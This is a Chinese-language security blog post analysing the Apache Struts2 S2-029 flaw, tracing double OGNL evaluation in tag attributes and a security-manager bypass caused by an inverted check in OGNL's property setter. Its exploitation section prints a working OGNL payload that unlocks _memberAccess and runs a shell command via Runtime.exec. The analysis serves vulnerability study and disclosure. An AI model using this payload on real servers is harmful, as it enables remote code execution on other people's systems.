
 <!DOCTYPE HTML>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>Struts2-S2-029漏洞分析 | 随风&#39;S Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="iswin">
    

    
    <meta name="description" content="关于这个Struts2的漏洞感慨颇深，首先根据官方漏洞的描述，大家应该能很快找到漏洞出现的位置，基本上Struts2里面大部分标签都是存在OGNL代码二次执行的问题，问题虽然能很容易的发现，但是在最新版本里面要想成功利用该漏洞执行任意代码，需要绕过Struts2的安全管理器，所以说整个漏洞变成了一个如何绕过Struts2安全管理器的问题，我花了很多时间在想办法如何去绕过Struts2的安全管理器">
<meta name="keywords" content="JAVA,Struts2">
<meta property="og:type" content="article">
<meta property="og:title" content="Struts2-S2-029漏洞分析">
<meta property="og:url" content="https://www.iswin.org/2016/03/20/Struts2-S2-029漏洞分析/index.html">
<meta property="og:site_name" content="随风&#39;S Blog">
<meta property="og:description" content="关于这个Struts2的漏洞感慨颇深，首先根据官方漏洞的描述，大家应该能很快找到漏洞出现的位置，基本上Struts2里面大部分标签都是存在OGNL代码二次执行的问题，问题虽然能很容易的发现，但是在最新版本里面要想成功利用该漏洞执行任意代码，需要绕过Struts2的安全管理器，所以说整个漏洞变成了一个如何绕过Struts2安全管理器的问题，我花了很多时间在想办法如何去绕过Struts2的安全管理器">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_id_1.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_id_2.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_id_3.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_1.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_4.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_1.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_2.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_3.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_5.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_6.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_7.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_poc_bypass_8.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_bypasspoc_1.png">
<meta property="og:image" content="https://www.iswin.org/attach/struts2_bypasspoc_2.png">
<meta property="og:updated_time" content="2016-04-15T16:26:58.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Struts2-S2-029漏洞分析">
<meta name="twitter:description" content="关于这个Struts2的漏洞感慨颇深，首先根据官方漏洞的描述，大家应该能很快找到漏洞出现的位置，基本上Struts2里面大部分标签都是存在OGNL代码二次执行的问题，问题虽然能很容易的发现，但是在最新版本里面要想成功利用该漏洞执行任意代码，需要绕过Struts2的安全管理器，所以说整个漏洞变成了一个如何绕过Struts2安全管理器的问题，我花了很多时间在想办法如何去绕过Struts2的安全管理器">
<meta name="twitter:image" content="https://www.iswin.org/attach/struts2_id_1.png">

    
    <link rel="alternative" href="/atom.xml" title="随风&#39;S Blog" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/jacman.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/jacman.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/author.jpg" alt="随风&#39;S Blog" title="随风&#39;S Blog"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="随风&#39;S Blog">随风&#39;S Blog</a></h1>
				<h2 class="blog-motto">网络安全爱好者</h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="菜单">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
						<li><a href="/atom.xml">RSS</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="搜索" />
						<input type="hidden" name="q" value="site:www.iswin.org">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
  
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2016/03/20/Struts2-S2-029漏洞分析/" title="Struts2-S2-029漏洞分析" itemprop="url">Struts2-S2-029漏洞分析</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="iswin" target="_blank" itemprop="author">iswin</a>
		
  <p class="article-time">
    <time datetime="2016-03-20T05:20:12.000Z" itemprop="datePublished"> 发表于 2016-03-20</time>
    
  </p>
</header>
	<div class="article-content">
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">文章目录</strong>
		
			<ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞详情"><span class="toc-number">1.</span> <span class="toc-text">漏洞详情</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-Struts2安全管理器"><span class="toc-number">2.</span> <span class="toc-text">Bypass Struts2安全管理器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞利用"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用</span></a></li></ol>
		
		</div>
		
		<blockquote>
<p>关于这个Struts2的漏洞感慨颇深，首先根据官方漏洞的描述，大家应该能很快找到漏洞出现的位置，基本上Struts2里面大部分标签都是存在OGNL代码二次执行的问题，问题虽然能很容易的发现，但是在最新版本里面要想成功利用该漏洞执行任意代码，需要绕过Struts2的安全管理器，所以说整个漏洞变成了一个如何绕过Struts2安全管理器的问题，我花了很多时间在想办法如何去绕过Struts2的安全管理器，一开始我从来没有想过Struts2里面的_memberAccess变量可以被修改，因为前几次Struts2的RCE问题中_memberAccess变量已经被纳入黑名单了，同时我把Struts2的安全管理器的源代码也看了一遍，似乎都很合理，但是直到安恒研究院的同学把POC丢出来的时候，_memberAccess变量依然可以被修改，真的是让人匪夷所思。所以本文也主要是围绕这个Bypass安全管理器来进行探讨，看看究竟是什么原因导致了Bypass安全管理器。</p>
</blockquote>
<h3 id="漏洞详情"><a href="#漏洞详情" class="headerlink" title="漏洞详情"></a>漏洞详情</h3><p>从官方的描述看来这次是Strut2标签的问题，而且还是标签属性值OGNL二次解析的问题，利用条件比较苛刻，所以说这个漏洞威力并没有那么大，下面直接给出一部分存在问题的标签，其他的标签大家自己去找，这里只列出来几个比较典型的，这里主要说两类标签属性值，一个是id属性，在<strong><strong>org.apache.struts2.components.UIBean</strong></strong>类中我们很容易发现id参数在setID时已经进行了第一次OGNL表达式的执行，如下图<br><img src="/attach/struts2_id_1.png" width="820"><br>然后紧接着在org.apache.struts2.components.UIBean.populateComponentHtmlId(Form)方法中进行了第二次的OGNL表达式解析，如下如的<br><img src="/attach/struts2_id_2.png" width="820"><br>findStringIfAltSyntax方法最终会调用findString方法进行id值的第二次OGNL表达式执行</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> String <span class="title">findStringIfAltSyntax</span><span class="params">(String expr)</span> </span>&#123;</span><br><span class="line">		<span class="keyword">if</span> (altSyntax()) &#123;</span><br><span class="line">		    <span class="keyword">return</span> findString(expr);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> expr;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>所以说这里凡是调用了org.apache.struts2.components.UIBean.populateComponentHtmlId(Form)方法的标签都存在二次解析的问题，通过eclipse很简单就可以找到有哪些标签存在这个问题，如下图<br><img src="/attach/struts2_id_3.png" width="820"><br>所以下列标签中的id属性只要可控，那么就会导致任意代码执行的问题<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;s:head id=<span class="string">""</span>/&gt;</span><br><span class="line">&lt;s:file id=<span class="string">""</span>/&gt;</span><br><span class="line">&lt;s:reset id=<span class="string">""</span>/&gt;</span><br><span class="line">&lt;s:submit id=<span class="string">""</span>/&gt;</span><br><span class="line">&lt;s:updownselect id=<span class="string">""</span> list=<span class="string">""</span>/&gt;</span><br></pre></td></tr></table></figure></p>
<p>另一类为name属性，name属性的二次解析需要标签中的value为空，这样才能进行二次代码执行，由于name属性调用了org.apache.struts2.components.Component.completeExpressionIfAltSyntax(String)该方法，该方法定义如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> String <span class="title">completeExpressionIfAltSyntax</span><span class="params">(String expr)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (altSyntax()) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="string">"%&#123;"</span> + expr + <span class="string">"&#125;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> expr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>该方法会自动在第一次表达式执行后添加%{}来标识这是一个ongl代码块，所以在写POC的时候记得这种情况下不要加%{},因为它会自动添加，比较典型的属性有</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;s:hidden name="%&#123;#request.poc&#125;"&gt;&lt;/s:hidden&gt;</span><br></pre></td></tr></table></figure>
<p>其他的标签属性都一样，就不一一列举了。在Struts2的低版本中直接用以前Struts2的POC就可以了，但是在高版本中加入了新的安全策略，所以导致了在新的版本中以前的POC是没法用的。</p>
<p>不过对于漏洞的检测是没啥问题的如下图</p>
<p><img src="/attach/struts2_poc_1.png" width="820"></p>
<p>不能执行命令，对于这个非常鸡肋的漏洞来说就更鸡肋了，下面来看看怎么bypass安全管理器的。</p>
<h3 id="Bypass-Struts2安全管理器"><a href="#Bypass-Struts2安全管理器" class="headerlink" title="Bypass Struts2安全管理器"></a>Bypass Struts2安全管理器</h3><p>在讨论Bypass之前，首先非常感谢<strong><strong>安恒信息安全研究院同学</strong></strong>POC的分享。</p>
<p>在想怎么bypass安全管理器的时候，我对Struts2的安全管理器的策略也是花时间去看了的，毕竟对struts2不是特别的熟悉，我们先看看最新版本里面对OGNL表达式执行做了哪些限制，如下图</p>
<p><img src="/attach/struts2_poc_bypass_4.png" width="820"></p>
<p>Struts2默认的安全规则就是上面红色框标记的部分，主要排除了一些可能存在问题的类以及包，首先来看看安全管理器有哪些东西，如下图<br><img src="/attach/struts2_poc_bypass_1.png" width="820"></p>
<p>SecurityMemberAccess类继承了OGNL默认的的安全管理器DefaultMemberAccess，我们来看看DefaultMemberAccess类中有哪些属性以及他们的访问权限，如下图<br><img src="/attach/struts2_poc_bypass_2.png" width="820"><br>这里可以看到上面圈起来的三个属性的修饰符是public，在DefaultMemberAccess中判断了调用方法的修饰符，如下图<br><img src="/attach/struts2_poc_bypass_3.png" width="820"><br>如果调用属性的修饰符为public时就默认通过，那么我是否可以直接对上述三个属性值进行修改，看样子好像是不行的，因为Struts2的默认规则里面排除了该类型(MemberAccess),但是要想去修改_memberAccess变量中私有的属性值,必须得将上述三个变量设置为true。</p>
<p>我们再来看看SecurityMemberAccess类中是如何对OGNL表达式进行限制的，com.opensymphony.xwork2.ognl.SecurityMemberAccess.isAccessible(Map, Object, Member, String)方法最终进行判断的方法，部分代码如下<br><img src="/attach/struts2_poc_bypass_5.png" width="820"><br><img src="/attach/struts2_poc_bypass_6.png" width="600"><br>首先会按照默认规则进行判断，一旦不满足其中任何一个条件就会返回false，表示该OGNL表达式不具备执行的条件，通过对默认的规则进行分析以及fuzz，发现新版本中的规则都很死，要想执行命令或者静态方法基本上不太现实，但是POC明明是能够成功调用静态方法以及new对象和调用对象的任何方法，究竟是怎么回事？</p>
<p>我把OGNL表达式的执行流程走了一遍，发现Struts2开发人员在对ONGL表达式中的赋值操作时将判断条件写反了，这样一来就直接导致了前边做的所有的安全策略，在这里根本起不了作用，出问题的代码在ognl.ObjectPropertyAccessor.setPossibleProperty(Map, Object, String, Object)，该函数主要是对OGNL语法树中的赋值表达式进行解析以及通过反射去完成相应的赋值操作，具体代码如下<br><img src="/attach/struts2_poc_bypass_7.png" width="820"><br>我们先跟进ognl.OgnlRuntime.setMethodValue(OgnlContext, Object, String, Object, boolean)方法，如下<br><img src="/attach/struts2_poc_bypass_8.png" width="820"><br>也就是说如果ognl.OgnlRuntime.setMethodValue(OgnlContext, Object, String, Object, boolean)方法返回true代表权限检查通过，否则返回false，也就是安全检查失败，但是这里的条件进行判断时把条件给写反了<br>ognl.ObjectPropertyAccessor.setPossibleProperty(Map, Object, String, Object)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//当条件不满足时返回false，一取反就成true，if条件满足，接着就会调用相关函数进行赋值操作</span></span><br><span class="line"> <span class="keyword">if</span> (!OgnlRuntime.setMethodValue(ognlContext, target, name, value, <span class="keyword">true</span>))</span><br><span class="line">     &#123;</span><br><span class="line">     	result = OgnlRuntime.setFieldValue(ognlContext, target, name, value) ? <span class="keyword">null</span> : OgnlRuntime.NotFound;</span><br><span class="line">     &#125;</span><br></pre></td></tr></table></figure>
<p>所以说上述代码才是实现修改_memberAccess成员变量属性的决定性因素，所以即使做了权限检查，调用了相关判断函数，但是最终应为一个判断条件二前功尽弃，实在是不应该。</p>
<p>就是因为这个关键条件的判断的问题，导致了我们可以修改_memberAccess的任意属性哪怕是私有的属性。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>在bypass过安全管理器后，我们要想实现执行任意代码，只需要allowStaticMethodAccess=true(执行静态方法)，excludedPackageNamePatterns=空集合(可以调用相关包)以及excludedClasses=空集合(可以调用任何类)，满足这三个条件就可以执行任意代码了。</p>
<p>执行命令的POC如下</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec('whoami').getInputStream()).useDelimiter('\\\\A'),#str=#s.hasNext()?#s.next():'',#res.print(#str),#res.close()</span><br></pre></td></tr></table></figure>
<p>这里需要注意的是在一开始的时候我说主要有两类标签属性存在问题，一类是id，一类是name<br>如果id的属性可以控制，类似于下面代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;s:file id=<span class="string">"%&#123;#request.poc&#125;"</span> /&gt;</span><br></pre></td></tr></table></figure>
<p>那么对于的POC为如下图<br><img src="/attach/struts2_bypasspoc_1.png" width="820"></p>
<p>如果对应的标签属性为name时，代码如下</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;s:hidden name="%&#123;#request.poc&#125;"&gt;&lt;/s:hidden&gt;</span><br></pre></td></tr></table></figure>
<p>POC要稍微有点变化，因为name属性第二次进行OGNL调用时会自动对表达式加上%{}字符，所以对应的POC为如下图<br><img src="/attach/struts2_bypasspoc_2.png" width="820"></p>
<p>不过上述标签的属性值不一定是直接通过参数传进来，具体的利用场景需要结合实际的条件。</p>
<p>###参考<br>[1] :<a href="http://seclab.dbappsecurity.com.cn/?p=678" target="_blank" rel="noopener">http://seclab.dbappsecurity.com.cn/?p=678</a></p>
  
	</div>
		<footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/Struts2/">Struts2</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/JAVA/">JAVA</a><a href="/tags/Struts2/">Struts2</a>
  </div>

</div>



	<div class="article-share" id="share">
	
	  <div data-url="https://www.iswin.org/2016/03/20/Struts2-S2-029漏洞分析/" data-title="Struts2-S2-029漏洞分析 | 随风&#39;S Blog" data-tsina="null" class="share clearfix">
	  </div>
	
	</div>


</footer>

   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2016/10/15/Simple-CAPTCHA-Recognition-with-Machine-Learning/" title="机器学习之识别简单验证码">
  <strong>上一篇：</strong><br/>
  <span>
  机器学习之识别简单验证码</span>
</a>
</div>


<div class="next">
<a href="/2016/02/27/Xstream-Deserializable-Vulnerablity-And-Groovy-CVE-2015-3253/"  title="XStream Deserializable Vulnerablity And Groovy CVE-2015-3253漏洞分析">
 <strong>下一篇：</strong><br/> 
 <span>XStream Deserializable Vulnerablity And Groovy CVE-2015-3253漏洞分析
</span>
</a>
</div>

</nav>

	

</div>  
      <div class="openaside"><a class="navbutton" href="#" title="显示侧边栏"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">文章目录</strong>
 
 <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞详情"><span class="toc-number">1.</span> <span class="toc-text">漏洞详情</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-Struts2安全管理器"><span class="toc-number">2.</span> <span class="toc-text">Bypass Struts2安全管理器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞利用"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用</span></a></li></ol>
 
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="隐藏侧边栏"></a></div>
<aside class="clearfix">

  
<div class="categorieslist">
	<p class="asidetitle">分类</p>
		<ul>
		
		  
			<li><a href="/categories/JAVA/" title="JAVA">JAVA<sup>10</sup></a></li>
		  
		
		  
			<li><a href="/categories/Linux/" title="Linux">Linux<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/Python/Machine-Learning/" title="Machine Learning">Machine Learning<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/ORACLE/" title="ORACLE">ORACLE<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/Python/" title="Python">Python<sup>3</sup></a></li>
		  
		
		  
			<li><a href="/categories/Spring/" title="Spring">Spring<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/Struts2/" title="Struts2">Struts2<sup>1</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">标签</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/JAVA/" title="JAVA">JAVA<sup>10</sup></a></li>
			
		
			
				<li><a href="/tags/Deserialize/" title="Deserialize">Deserialize<sup>5</sup></a></li>
			
		
			
				<li><a href="/tags/Python/" title="Python">Python<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/Spring/" title="Spring">Spring<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/RCE/" title="RCE">RCE<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Cdlinux/" title="Cdlinux">Cdlinux<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Linux/" title="Linux">Linux<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Machine-Learning/" title="Machine Learning">Machine Learning<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Scikit-Learn/" title="Scikit-Learn">Scikit-Learn<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Pybrain/" title="Pybrain">Pybrain<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/Struts2/" title="Struts2">Struts2<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/ORACLE/" title="ORACLE">ORACLE<sup>1</sup></a></li>
			
		
		</ul>
</div>


  <div class="linkslist">
  <p class="asidetitle">友情链接</p>
    <ul>
        
          <li>
            
            	<a href="http://p2j.cn" target="_blank" title="园长博客">园长博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.shack2.org" target="_blank" title="Shack2博客">Shack2博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.cnseay.com" target="_blank" title="Seay博客">Seay博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.z7ys.com" target="_blank" title="z7y博客">z7y博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://bluereader.org" target="_blank" title="深蓝阅读">深蓝阅读</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.untnt.com" target="_blank" title="TNT博客">TNT博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.03sec.com/" target="_blank" title="Sky博客">Sky博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.jxcm.net/" target="_blank" title="DCC博客">DCC博客</a>
            
          </li>
        
          <li>
            
            	<a href="http://cnbraid.com" target="_blank" title="Braid&#39;s Blog">Braid&#39;s Blog</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.xiyv.net" target="_blank" title="wolf&#39;s blog">wolf&#39;s blog</a>
            
          </li>
        
          <li>
            
            	<a href="https://www.blackh4t.org" target="_blank" title="DarkRay&#39;s BLoG">DarkRay&#39;s BLoG</a>
            
          </li>
        
          <li>
            
            	<a href="http://www.00theway.org" target="_blank" title="00theway&#39;s Blog">00theway&#39;s Blog</a>
            
          </li>
        
          <li>
            
            	<a href="https://bksec.net/" target="_blank" title="my5t3ry&#39;s Blog">my5t3ry&#39;s Blog</a>
            
          </li>
        
          <li>
            
            	<a href="https://www.00day.com/" target="_blank" title="Luoye&#39;s blog">Luoye&#39;s blog</a>
            
          </li>
        
          <li>
            
            	<a href="https://www.imbeee.com" target="_blank" title="Beeeの零碎事">Beeeの零碎事</a>
            
          </li>
        
    </ul>
</div>

  


  <div class="rsspart">
	<a href="/atom.xml" target="_blank" title="rss">RSS 订阅</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<section class="info">
		<p> 当才华还撑不起野心时，那就应该静下心来学习。 <br/>
			当能力还驾奴不了目标时，就应该沉下心来历练。</p>
	</section>
	 
	<div class="social-font" class="clearfix">
		
		
		
		
		
		
		
		
		
		
	</div>
			
		

		<p class="copyright">
		Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/wuchong/jacman" target="_blank" title="Jacman">Jacman</a> © 2022 
		Hosted by <a href="https://pages.coding.me" style="font-weight: bold">Coding Pages</a>
		
		<a href="/about" target="_blank" title="iswin">iswin</a>
		
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<a href="#" class="overlay" id="qrcode"></a>',
  '<div class="qrcode clearfix"><span>扫描二维码分享到微信朋友圈</span><a class="qrclose" href="#nothing"></a><strong>Loading...Please wait</strong><img id="qrcode-pic" data-src="http://s.jiathis.com/qrcode.php?url=' + encodedUrl + '"/></div>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);
  $('.article-share-qrcode').click(function(){
    var imgSrc = $('#qrcode-pic').attr('data-src');
    $('#qrcode-pic').attr('src', imgSrc);
    $('#qrcode-pic').load(function(){
        $('.qrcode strong').text(' ');
    });
  });
});     
</script>









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->





<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="返回顶部"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
